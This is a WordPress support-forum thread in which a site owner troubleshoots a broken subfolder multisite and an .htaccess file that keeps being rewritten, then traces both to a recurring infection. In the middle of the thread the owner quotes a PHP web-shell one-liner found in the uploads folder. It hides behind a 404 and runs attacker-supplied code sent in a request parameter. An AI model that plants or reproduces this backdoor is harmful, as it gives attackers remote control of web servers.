• I have a problem with multisite. Something happened and multisite based on subfolders doesn’t work properly.

    See for yourself

    Main site in polish works but if you press language-flag that links you to multisite (for example /ger) it loads slowly on firefox (in chrome doesn’t load at all) and the result is there’s no images. I tried to check if images in multisites works but when I write it’s url it redirects to multisite’s first page, for ex.:

    http://europool.pl/ger/wp-content/uploads/sites/9/2014/12/trns11.png

    redirects to

    http://europool.pl/ger

    Second weird thing is I cant edit htaccess file, it’s being automatically rewritten every time I upload new/make changes.

    There was spambot on this site but it was removed…

    OK

    I have located the problem – it’s that htaccess is automatically rewritten, but I don’t know why

    What’s it being rewritten TO?

    Found the problem, it was a malware. Site was hacked i guess.

    It was same problem as here

    Solution works, BUT two days later it returned. So i searched and I found file with this code (in uploads directory)

    <?php if (!isset($_REQUEST['af5f492a1'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['af5f492a1'], ''); ?>

    Is it part of a virus?

    Not good. Site is still infected – when I remove that malware, and wait one day it regenerates itself. How do I detect where it’s hidden?

    I have updated WordPress and plugins to the latest versions. Let’s see if problem will be back tomorrow.
